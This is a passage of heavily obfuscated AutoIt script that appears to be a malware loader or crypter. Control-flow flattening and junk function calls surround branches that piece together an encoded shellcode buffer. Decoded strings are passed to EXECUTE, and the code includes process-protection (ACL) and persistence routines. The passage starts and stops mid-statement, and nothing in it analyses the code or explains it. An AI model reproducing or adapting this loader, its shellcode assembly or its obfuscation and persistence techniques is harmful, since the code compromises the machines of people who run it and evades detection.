= 100830152 MOD (2861522 , 1236259 ) MOD (189487 , 3886347 ) ENDIF IF $656182541 = 1330478138 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..3,5..,6..1,5..9..,6,..54,..61..,5..3,..4,..6..1..,..6..2..,61..,..5..8..,5..8,5..7,6..,..6..,..6,..6,6,..6..,..61,..2,5..7" , ".." ) ) $656182541 = 1048715572 ISFLOAT (2452762 + 4291149395 + 3191120 ) ENDIF IF $656182541 = 1364348677 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..60,54,5..6,..3,..5..3,56,..6,..5..4..,53..,6..,..2,..6..0..,57,..5..9,..54..,57,6..1,6..2,..6..0,4,..6..,61,61,62" , ".." 
) ) WINEXISTS ("V21SpfAAmz1LfOY6btXBocW7WuUaEH2VSMBjgJB4kqMmKZ1H9jOFVBNTg364uz5NGf3CmNZB22r8yIw6Dlbv2w9q8SdmNGIUu8OE6xuvtnN" ) $656182541 = 411711931 ISFLOAT ("G9AjyJWjgMDDKMXutGMA41af1OcNThgsyFOOgzuUmFyt40VQAsIMd3MQ8vrTHhA8" ) DIM $E7HO3L2NXBRKA4VNZHDO = 2037021 ENDIF IF $656182541 = 1368549586 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,6,..61,53..,56,..6,2,61,..5..6,60,..4,5..,..3..,..53,..5..3..,6..1,..62..,5..7..,..6..0,5..6..,..57,..5..3,6..,6..1..,5..7" , ".." ) ) ISFLOAT (511549 + 320807 + 1705817 ) $656182541 = 621304772 ISPTR (2910683 + 2685881 ) ENDIF IF $656182541 = 1396856746 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58..,3..,..53,6..0,..5..7,54,..55..,6..1..,..2..,5..7..,..4,6,..5..7,..61..,5..6..,..3..,..6..0,55..,6..1..,..5..3,6..,..2..,6..0..,5..7..,..59.." , ".." ) ) MOD (1152203 , 663470 ) $656182541 = 823793270 ENDIF IF $656182541 = 1428652054 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,..1,6..2..,5..3..,..53,..5..3..,5..3..,..5..3,5..3,..55..,..53,60,5..7,..5..4,62..,6..1..,5..8..,3,53,..6..0..,..6..2,5..3,..57,5..9..,1" , ".." ) ) $656182541 = 438111387 RANDOM (1807612 ) ENDIF IF $656182541 = 1453481599 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..5..8..,..6..0..,59..,5..7..,5,5..4,..5..3,5..4,3..,..6..0,..6..1,58,..59,..6..1..,..6..,..6,6..,..6..,..6..,..6..,54..,..61,..5..,..57" , ".." ) ) $656182541 = 1947300206 DIM $B3BPOL4V2CE0NUXK0XAK = 255458 * 3018391 * 725577 + 4291946556 WINEXISTS ("DF5nxSbJJaOH91THnd25XQ8pbiQeT1dU8lKtTGa2YmzkyBV4B7GXS9dYHOlob71S64JXqzZRd9gJpY0JxVMWuqc9iWVduV11vSnE17" ) ENDIF IF $656182541 = 1461966853 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,5..8,..4,..3,..6,5,..6,6..,6..,6,..5..8,..53,5..8..,55..,58..,55..,5..9,1,53..,..57..,58,55,..5..8,..55..,..58" , ".." 
) ) DIM $TS2CHUYL1PUEWQ2JODNV = 1418218 + 567903 + 926522 + 4292649082 + 4292096687 + 4294442025 + 4292394753 $656182541 = 706340665 ENDIF IF $656182541 = 1469834065 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..6,..57,..1,5..3,..5..7..,5..3,56,..5..8,5..5..,..5..3..,57,..6..1..,62,..57..,4..,6..,5..7..,5..6..,2..,..6..1,..6..,1..,..5..7..,..53.." , ".." ) ) DIM $OT4KFQUHLQSIWWDAIMOA = "C3AhUA2jHDapMGMyHT7m" $656182541 = 1599451200 ENDIF IF $656182541 = 1477365537 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,3,53..,..5..6..,4,58..,..5..3,5..7,..58,5..3..,53..,53..,..5..3,53..,6,6..1..,..57,6..,3,..53..,55,53..,53..,..5..3..,53.." , ".." ) ) INT (70644 ) $656182541 = 2054240656 ENDIF IF $656182541 = 1479637702 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,53..,..5..3..,..53..,..53,5..9..,1,..57,5..3,..59,..6..1,53,..5..3..,..56..,5..3,53..,..53,..5..3..,5..3,6..,..6..,..6..0,59..,58..,..53" , ".." ) ) $656182541 = 1038131997 ISSTRING ("0CyeXr3UZ1cb3rXiTBsiFj1dY9JbWVW5e7gTMOMZfDAjdSJiATdxkuqQLvqYS28eeg76keEdYCdbSR9fzBKdRyVUQzhry" ) MOD (2052693 , 1447557 ) ENDIF IF $656182541 = 1508795126 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..61..,..5..3..,..53..,..5..3..,5..3,..53..,..58,60..,..5..8..,..5..6,..6,..6,..58..,..58..,..3,..57..,..6..1..,5..8..,3..,53..,..5..3,..6,..6..1,..57.." , ".." ) ) $656182541 = 1750055196 RANDOM (1449126 ) ENDIF IF $656182541 = 1513972166 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6,..6,5..6,..56,..3..,5..3,..5..8,6,..58,5..,..5..8..,..2,..61,..2,..5,..58..,58,4,3,55..,..5..3..,..3..,53,5..3" , ".." ) ) INT (951421 ) $656182541 = 1974167312 STRING ("pr5xOvnqU6mN8vZFvLduXEnZRZeBBBm6nB16K8zJGwmzbu" ) CHR (2887679 ) ENDIF IF $656182541 = 1569955931 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,4..,6..1..,5..7..,56,..58,53,..61,..62..,58..,..4..,..6,..3..,..6,..6,5..8,..58,5,..61..,..5..9..,..1,..57,5..7..,6..1,..4" , ".." 
) ) INT (3397414 ) $656182541 = 1974292710 DIM $FQ0RVYSUQAGD35WLCXAS = "YwoSaTZ3Ow1g2EsJsVH3QV4d1HXphYdjCortKIUfD0KdQxaAdLkb3yidBl1B5JW0tRMNm98TaBzZj0wCHwlEMbqego1zSsk3e" RANDOM (3022268 ) ENDIF IF $656182541 = 1577105263 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..5..8..,..4,..6..,3,5..6,56..,..6,6..,..6..1..,..56..,..6..0,..4..,..4..,6..1..,..53..,..5..3,..60..,5..7..,..53,..60,5..8,..6..0..,6,..6" , ".." ) ) $656182541 = 172415000 ENDIF IF $656182541 = 1586164444 THEN LOCAL $RET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50..,57,..5..7..,..59,3..,59..,..3,..57..,5..6,59..,5..4..,..5..9..,..3..,5..9..,..3..,..5..7,5..4..,..59..,..57,59..,..57,..6..0..,..5..5..,59..,5..8,60..,..5..6..,..6..0,56..,55,61..,5..5,5..5,5..9..,..5..7,6..0,..6..0,59..,6,6..0,55,59..,..5..7,..5..5..,5..5,..55..,..3,5..5,5..3..,5..5,..57,59..,3..,6..0..,5..3,..5..8,56,59..,61..,..59,58,5..9..,..3,59..,..3,5..9,..5..6..,5..9,6,..5..9..,..5..7,..5..9..,..58..,55..,53..,55,..2,55,..53,5..5..,5..5..,56..,53..,..6..0,6..1..,..57..,5..5..,..57..,..58..,55..,55,..55,..3,5..5..,..53,55..,..55..,60,60,6..0..,56,..60..,..57,6..0,5..5,..55..,5..5..,..5..5,..3..,..55,..53,5..5..,5..7..,..60..,..60,58..,53,..5..9..,5..4..,..6..0..,..57..,59,..6..1,..5..5..,..3,55..,53,..55,55,..60,6..0,..6..0,..5..6..,..6..0,..5..7..,..60..,..5..5..,..5..5..,5..5,55,..3,5..5..,5..3..,..5..5,..55" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,5..5..,5..5,..3..,55,53..,5..5..,5..5..,60..,53..,60,57..,..60..,55..,..55,55..,5..5..,3..,..5..5..,5..3..,..5..7,5..7..,..59..,..3..,5..9,3,..58..,5..6..,6..0..,..57..,6..0,5..5,6..0,5..8,59,..56..,..60..,5..7,..5..7,..60..,..5..9..,5..8..,6..0..,57,..58,..5..3..,..6..0,..5..7..,..6..0..,..5..5,55..,..61,..5..5..,..57,..5..7..,..59..,..59..,6..2,5..9..,..3..,59..,..5..8..,..5..8..,6..,58..,56..,..6..0..,57,60..,..55..,60,..5..8..,59,5..6..,..60,..57..,55,62..,..5..5..,..62.." , ".." 
) ) ) ) $656182541 = 1205248241 STRING (2218093 + 880111 + 1666509 ) ENDIF IF $656182541 = 1587018324 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1..,..5..3,..56..,5..7,5..8,..6,61,6..1,..62..,61..,5..8,..3..,5..3,..6,3..,6..,6,6,..6..,..61..,4..,6..1,..58..,54..,53" , ".." ) ) RANDOM (529060 ) $656182541 = 1318416169 ISFLOAT ("VygxSkjh1la0fXvpKtxLFYGAIlZp6ezsjCHDEAOUyqycsJDTL28RuOa72OYGv3" ) ENDIF IF $656182541 = 1599451200 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,53,..5..3..,..5..3,..5..3..,6..0..,55..,..6..2,..58,5..6..,..5..6..,..6..,6,..58,..60..,6,..6,6..0,59..,5..8,..5..3..,58..,..5..6,6,6" , ".." ) ) ISFLOAT (1037561 * 629238 + 4292420501 + 983530 ) $656182541 = 90298599 ENDIF IF $656182541 = 1604509846 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6,..6..,..6..,6..,..6..1,4..,5..7,58,..1..,61..,61..,..62,..61..,5..8..,5..6..,..3..,6..,6..,6,6..,..6,6,..61..,..4" , ".." ) ) ISBINARY ("T7DBJL0MiyFf" ) $656182541 = 2060391673 ISBOOL (3447033 * 534323 * 174310 ) ISPTR (1522803 * 3287096 + 965819 ) ENDIF IF $656182541 = 1655436234 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..8,..58..,61..,..2,..5..,..3..,5..8..,..54,5..8..,54..,..58,56,5..8..,..5..9,5..8..,..6..0,..61,..2..,..6..0,..4,..53,..6..1,56..,..56" , ".." ) ) $656182541 = 781366022 ENDIF IF $656182541 = 1700940958 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..7,6,5..7,..5..8,..2..,..6..1,..58..,..5..3..,5,..6..1..,57,55,6,..5,6..,6..,..6,..6..,..6..1..,..2,6..1..,3..,..2..,5..8..,55" , ".." ) ) WINEXISTS ("FoQjXnHg0L35rQpaRcouYtiq75n0QRYForGCWKUj7R8MvmxvDlCMaISmgzm29SAi" ) $656182541 = 496318929 ISFLOAT ("XofsewguE5VG1vDokE" ) INT (1449336 ) ENDIF IF $656182541 = 1713506615 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("55..,..61..,..6,..6,6,6..,6,6..,..6..1,4..,..57..,5..8..,1..,57..,61,..62,6..1..,..58..,5..5..,..3,6..,6..,..6,6,..6" , ".." 
) ) $656182541 = 432319576 MOD (1091695 , 3317559 ) ISSTRING ("R7wu5mL1KDBvhv64M2bBZA2R" ) ENDIF IF $656182541 = 1718368979 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6,..6..,6,5..6..,..2,..57..,5..8..,..53..,3,..60..,57,5..4,..5..7..,..61,2..,..5..8,5..8..,6,3,..5..7,59..,..56,2,60" , ".." ) ) $656182541 = 1051260188 RANDOM (980872 ) ENDIF IF $656182541 = 1723957288 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,5..7..,5..7,..5..9..,3,..59,3,5..7..,56..,..59,..54..,..59..,3,..59..,..3,5..5,..61,..5..5,55..,..5..9..,..2,..5..9,58..,..60,..5..5,..5..9,5,..5..9..,5..8,..5..9..,3..,56,5..6..,..56..,..55..,..5..5..,5..5,5..5..,..3..,..55,..53,..55..,55,..59,5..7,60..,..6..0..,..5..9,6,..60,55,5..9,57,5..5..,5..5,55..,..3..,..5..5,..53,55,5..5..,..5..8..,59,..59..,..62..,..6..0,..55..,6..0..,..5..7..,..60..,5..8..,59..,..5..4..,..59..,3..,..57,..59..,..60" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5..,5..9..,5..8,5..9..,..5..8,5..5,..55,..5..5,..3,..5..5..,..5..3,55,..5..5,5..9..,57..,60,60..,..59..,..6,60..,..5..5,5..9,5..7..,..55,55,..5..5,..3,..5..5..,..5..3..,..55..,..57,5..9..,..3..,6..0,5..3..,..58..,5..6..,59,..61,..59,58,..5..9..,..3..,5..9..,..3,59..,5..6,..59..,..6..,..59..,57..,5..9..,..58,..5..5,..3,5..5,..5..3..,..55..,5..5..,..5..9,..57,..6..0,..60..,5..9,..6,..60,5..5,5..9,57..,..55..,5..5..,..5..5..,..3..,5..5,5..3,55.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,..5..6,..53..,55,55..,..55,3..,..5..5..,..53,55..,5..5,..59,5..7,6..0..,60,..5..9,..6,..60..,..55,..59,..5..7,55..,..5..5..,..5..5,..3..,..55,5..3..,5..5,55,5..6,..53..,..6..0..,61..,5..6,..6..1,5..6,53..,56,5..3,5..6,..53,55,..5..5..,..5..5,62.." , ".." ) ) ) ) EXITLOOP PTR (2269633 * 1876835 * 3508062 ) ENDIF IF $656182541 = 1745262236 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..6..,..6,..6..0,..5..9,..5..8,5..3,5..9..,..1..,53,..53,6..,6,..58..,..5..8,..6..2..,61..,61..,2..,4..,61..,6..1..,58..,4..,..2.." , ".." 
) ) DIM $4T4LGD5XQEO3AFWV4GMM = "RzdXsJEvO9V63mEKE0VnryBl6Hvkh1uUrHn41xX3zbKe47g3qUzRA9lr" $656182541 = 937837217 PTR (895226 + 3244402 ) ISBINARY ("KUgd1XpXxq8BB3wANssw579GcQfXXz4tW5QatNIl6EIJ2sVA1xbRv8dMVIalSCa8wOQGnwg9UgAAxyNU4O5yym8X1coUMxDDEKnnMnmDqb7oHMow5qrcG" ) ENDIF IF $656182541 = 1747756201 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..5..8,3,5..3,53,..6..,..6..1,..5..7..,..60..,..61,..5..3..,..55..,5..3..,5..3,..53..,53..,6..1..,..2..,..5..7,58,2,..3,..56..,2..,..57.." , ".." ) ) DIM $2QKHWVWL75WKAGQBBIWP = 2912788 + 961618 * 3511725 * 1476387 + 1750659 * 3602516 $656182541 = 1942454486 ISBOOL ("4OKLKRBlDjKKfBm48MAwpH9qlabVh5vhzfoSOgNHvR" ) ENDIF IF $656182541 = 1750055196 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,2,..6..,5..,6,6..,..6..,..6..,5..8..,6..0..,..59..,..1,..53..,57..,..6..1..,..4,..57..,..58..,..6..,6..1,58..,..5..3..,..6..1..,..2..,61" , ".." ) ) $656182541 = 1207367525 PTR ("hhOgvOuAKORdIYCkanDp192bImWVuiJ59woaV82ctQd3NMWybO1nu3RioNHj2IfBe" ) ENDIF IF $656182541 = 1791187076 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,5,..5..7,..6,5..,..6..,..6,..6..,6..,56..,..5..6..,..3..,53,..61,6..2..,60..,4,..6,..57..,..59..,..59,56..,..2,57..,5..9" , ".." ) ) DIM $CZBUB5K59W5ZXUQRVJFQ = 388633 * 456518 + 4292093314 + 3032764 + 4292546598 * 3509147 $656182541 = 896046375 PTR (972489 * 3553081 * 2050349 + 961001 ) ENDIF IF $656182541 = 1808850186 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("54..,61,5..3..,..5..6,..3..,6,..61,..6..2..,..58..,58..,6,3,6..1..,..62,..57,..4,..6..,..6..1,61,62,57,..58..,..53..,61..,6..1" , ".." ) ) PTR ("Sl8EDSsJMrkJtlEwYIl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mUWVNCDL7HGa78DmSrCGbwD" ) ENDIF IF $656182541 = 1885155689 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6..,..6..,..60,6..2..,..5..6,1..,56,3,5..3..,60,6..1,62,..61,..5..8,..5..5,5..3,6,6,6..,6,6,6,..6..1..,..2.." , ".." 
) ) $656182541 = 1970938970 MOD (2335494 , 3656525 ) DIM $JC5CSBSKJYSAEFE1ABUL = 3323231 * 1033960 * 673699 ENDIF IF $656182541 = 1921072536 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..56,56..,..3..,6..2..,61..,..5..6..,..5,..6..1,53,..61,6..1,62,57,..4..,..6,..5..3,1,6..2..,..6..,..5,..6,..6,6..,6.." , ".." ) ) MOD (132187 , 174381 ) $656182541 = 1082073854 PTR (1563163 + 1001748 + 4293192249 ) MOD (2719725 , 1434301 ) ENDIF IF $656182541 = 1922466865 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,..4..,54..,56..,4..,..53..,..2..,3,60,..57,..5..8,61..,..61..,57..,5..7..,..5..5..,..60..,5..5..,..56..,..53..,..6..,3..,60,5..7,5..8.." , ".." ) ) INT (591028 ) $656182541 = 1330478138 WINEXISTS ("9yUWnsW7BIgmwkWRMJVBswyLJvJSUgsiQ30tMOc7XDw1hD8zALFijC" ) ENDIF IF $656182541 = 1924764602 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..6..,..5..7..,6..0..,..57..,62,6..0..,..5..8..,5..,5..3,..58..,..6,61..,2,..3,..5..9,..58..,5..,5..8,..4..,..3,..5..5,..53..,..57,..53" , ".." ) ) $656182541 = 1655436234 MOD (1348810 , 1037731 ) ENDIF IF $656182541 = 1942454486 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("59..,5..6,..57..,60..,..58..,5..3,..6..,5..8,..53,6..,..6..,60..,..58,4,6..1,..6..,6..,..58,..58,2,..5..3..,6..1,5..8..,3..,..53.." , ".." ) ) ISSTRING ("d7GXNY9GDfwkqiKj9mUntDCkoTrcKj8Ef9IILvZuMCOgFHWeUg8sUg" ) $656182541 = 1131844544 ENDIF IF $656182541 = 1947300206 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,..1,..5..3,61,..3,..60..,61..,..5..8,..59,3,..6..,6..,6,..6,6..,..6..,..5..,..5..6..,..3,..1..,4,..61..,5..3..,..5..6,..3" , ".." ) ) ISSTRING (3735416 + 3465486 ) $656182541 = 116925729 ISBOOL (1547430 + 4291515360 * 1477392 ) ENDIF IF $656182541 = 1970938970 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6..0..,61..,..4..,..5..7,58..,..5,..6..1,3,..6..0,61,..58..,..5..8,..3,6,6,6,6..,..6..,..6,..60..,62,57,..1,6..1.." , ".." 
) ) RANDOM (831899 ) $656182541 = 1296565717 ENDIF IF $656182541 = 1974167312 THEN LOCAL $E = EXECUTE PTR (294655 * 3649188 ) $656182541 = 860380632 ISSTRING ("NBDESHu4vFqUhR17tOAjBggAI7s1CJ4uEyboCRJ7ZVzBKp7H57EagkFGvd6VpDAVL5oTQLELfCtRRN0saU5Ff3ot2D2yVYSvtN0Obo2sB25M0YZSnMVE" ) ISFLOAT (2773503 * 755756 * 391473 * 1103808 ) ENDIF IF $656182541 = 1974292710 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,58,..4..,3,6,5..,6,6,..6,6..,..5..8,5..3..,6,6..,..58,..58,5..,..6..1,..59..,..6..1,..3,..3..,..5..3..,5..5,53.." , ".." ) ) STRING ("krV2Len8LCdNkkhdnXy8g8fxQIvaN12AW4dv9L50BVfBWGI4UnHl8eRllxmdSmtUKM1qhWeK1IGv3NLiaAqAtQCSn1jKz2ho" ) $656182541 = 871530397 ISFLOAT ("7i6uyHusHWdcr63A4jjcqMCl8Br4HXBDSNsrwvdk2IKZw0ZrH459FpGuQUw7pAUVtIuNNLdIg8kSbMZiL9vN1B7Bh7KL9f5" ) ENDIF IF $656182541 = 2022545531 THEN #region FLVAxkkwT $656182541 = 1713506615 ISPTR (775609 * 3395171 + 4291409108 ) PTR ("5ovpe" ) ENDIF IF $656182541 = 2032766480 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,..5..6,58..,..59..,..5..8..,6..0,..56..,5..6..,..6,..6,6..1..,62,6..0,..4,..2,..6..1..,59..,..5..7..,6..1..,2,5..6,5..8,..56,..53,..53" , ".." ) ) $656182541 = 116471326 WINEXISTS ("QaAJadT3khcMzuzXEIzxrMIRUTOwR6NlMO76yW2Du5i53K64NtyrlEocAUZrxwm" ) ENDIF IF $656182541 = 2054240656 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56..,..5..6..,3,..5..3,..5..9..,5..9,5..6..,62..,5..8,..5..9,53..,5..7..,53..,6,62,5..7,..3..,53,..56,..4,..5..7,3,53,..5..4,..53.." , ".." ) ) ISPTR ("xSR6cwENXjXUSwHv9iA5EN6Kf8S4BcLmHk5QKpC1HX6QDNNZQh11sB8TW" ) $656182541 = 238457315 ENDIF IF $656182541 = 2057237529 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,6..,6,6..,6,..6..1,..56,..3..,..5..3,..5..3..,..6..1..,..58..,53..,6..,6,..6..0..,58,4,6..1..,..6,6..,58,5..8,..6..2..,5..7.." , ".." 
) ) ISPTR (2376345 + 4293184136 ) $656182541 = 1747756201 ISPTR (2313154 * 2822069 + 423786 ) ENDIF IF $656182541 = 2060391673 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..7..,5..8..,..1..,..53,..61..,62,..6..1,..58..,..5..7..,..5..3..,..6..,6..,..6..,..6..,6..,..6..,..61,4..,..57..,58..,62..,..5..3,61,62..,..61.." , ".." ) ) INT (690914 ) $656182541 = 954977294 DIM $LM4EZYM8LLI3BGXYVHLT = 367976 ENDIF IF $656182541 = 2069227035 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..6,6,..6..0..,..59,..5..8..,5..3,6,6..,..6..0..,..59..,..5..6,..5..7,..6,6,..60..,..5..8,..4..,..61,..6,6,..58,5..8,..3..,..5..3.." , ".." ) ) STRING (3068014 * 2377603 * 2825303 ) $656182541 = 762027222 ENDIF IF $656182541 = 2081176827 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..7,..58..,6..1,..5,2,5..3..,3,..1..,..62..,53..,..53..,..5..3,5..3,..5..3..,5..3..,57,..53..,5..9,1,5..3..,..53,5..8,61,5..3.." , ".." ) ) $656182541 = 1061461686 ENDIF IF $656182541 = 2119340110 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0,..58..,..5..3..,..56,..5..6..,..5..6..,6,6,..57,..6..0,56..,5..6,..4..,55..,..61,..6..2,..6..0,4..,..6..,..5..7..,56,..56,3..,..53,6..1" , ".." ) ) MOD (13383 , 840807 ) $656182541 = 217336870 RANDOM (204136 ) RANDOM (3648981 ) ENDIF NEXT IF $PROTECT THEN ACL ($HANDLEFROMPID ) ENDIF IF $PERSIST THEN QTMVSHRFRD ($RET [ZVTZJDNXHRPQQIM ("53" ) ] ) ENDIF ENDFUNC #endregion FUNC BFSEZOFQQVRV () GLOBAL $1300820860 = 256356752 GLOBAL $AOAMUJVLTV = 2033156 FOR $E = 0 TO 551583 ISPTR (1420540 + 2012189 + 4291840624 + 4292863764 ) IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,..35,4..6,..1..,14,4" , ".." ) ) ) EXITLOOP MOD (2197646 , 498204 ) ENDIF IF $1300820860 = 256356752 THEN #region TuBoprHKA $1300820860 = 176683708 INT (2436641 ) STRING (3043919 * 1765421 ) ENDIF NEXT ENDFUNC FUNC QUBCAHBBZKYJ () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..3..5,4..6,..15..,1..8.." , ".." 
) ) ) ENDFUNC FUNC DDKWOYMJJPNF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..3..5..,..4..6,24..,15,18" , ".." ) ) ) ENDFUNC FUNC JWWTSBPFTDYX () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4,38..,..38,3,..2..7..,..38,..3..8" , ".." ) ) ) ENDFUNC FUNC CRAYOQRFEAMS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,..3..8,38..,..1..9,..46..,..4..4,..47,29,46,3..,..44..,..31..,27..,4..6,..31.." , ".." ) ) ) ENDFUNC FUNC BVMQYYKUKURA () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,38..,38,..19..,46..,..44..,4..7..,2..9,..46..,7,3..1,4..6,..4..,..2..7..,4..6..,..27" , ".." ) ) ) ENDFUNC FUNC YRBQDBYJGKXS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5,38,3..1..,..3,38..,..41,..4..5..,3..1.." , ".." ) ) ) ENDFUNC FUNC SHYKZNWGXGSG () GLOBAL $1300820860 = 256356752 GLOBAL $PNXRSOATLI = 3486648 FOR $E = 0 TO 710159 DIM $HNMUDSVCSZ60IMVSF3YB = "JUZSyHbRCVfD3MxDgsoFWuxv2gw74drr0V" IF $1300820860 = 176683708 THEN #endregion STRING (2638799 + 3112428 * 2601353 * 1450734 ) EXITLOOP STRING ("JjEEpwD0sldXzDXNhfDgDNElaETEFzwJOeSiuprG3WvIq9zkdSH33hE5NsEUM8u2YChuWOs1Y7nRr64bfIBX2CRHJWDcVH44BDUY1eyyzQf53XNSxCOdG" ) ENDIF IF $1300820860 = 256356752 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5..,3..8,3..1,3,..4..4..,..31..,27..,46..,3..1..,1..9,34,4..1..,..44,..4..6,29..,..47,4..6.." , ".." ) ) ) STRING (2299404 * 720385 + 391200 + 212652 ) $1300820860 = 176683708 DIM $JAJDWMXWNWIVNS20W4DY = 182921 ENDIF NEXT ENDFUNC FUNC MNIAOQEHLRXV () GLOBAL $1300820860 = 256356752 GLOBAL $NJJZ2JH0FR = 1612056 FOR $E = 0 TO 1284805 ISSTRING ("79591zMXxm6utXd1RVZnLH4ensov8n63URAdwtGXFWAOMnFTnB6iN6kyf1WIkqZjpdJMvaExncR0goAaWFhFqYoYFc8EH8M" ) IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..3..5..,..3..8..,..31,..5..,50..,..3..5..,..4..5,4..6,..4..5.." , ".." 
) ) ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN #endregion WINEXISTS ("n7I4Lour0AVXNis2AYWhtb90pyB2ZZ0w3i4IS3MIkUheWk" ) $1300820860 = 176683708 ISBINARY ("V0Wel8SOmXCCbJy4FoUjGlm6I35eeAunz1fFgeSK9ozWRrgDwqB24oAJNZErcNJWBockE2XBFjksWzorXARX8BskAF2rIzHvNMtCo69EDawVehXnJmEL" ) PTR ("1T99E2gKZNifWc1Als7fHgsSORw56x1YtFxmaE9ipjpDOhXkMkVD15yUAquXFlOAXtWpOOAQtZZx0ZcG3lrVMw7xhMVTklLeDYRvuGF7Tekbga3L" ) ENDIF NEXT ENDFUNC FUNC AZMTVPRVIOXM () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,35..,38,31..,..15,4..2..,..31..,40.." , ".." ) ) ) ENDFUNC FUNC WCCBBCANDNZP () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,3..5,..38..,3..1..,..18,3..1,..27,3..0.." , ".." ) ) ) ENDFUNC FUNC ZPVYEEXEUEWT () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..3..5,..38,..31..,..23..,44..,..3..5,4..6,3..1.." , ".." ) ) ) ENDFUNC FUNC YYEUJPRYPKCM () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("9,40,31..,..46,7..,3..1..,46.." , ".." ) ) ) ENDFUNC FUNC IGCFQUUWMEAF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("9,..4..5,1,3..0..,3..9,..3..5,..4..0.." , ".." ) ) ) ENDFUNC FUNC CJCCIDDEPTLC () RETURN EXECUTE 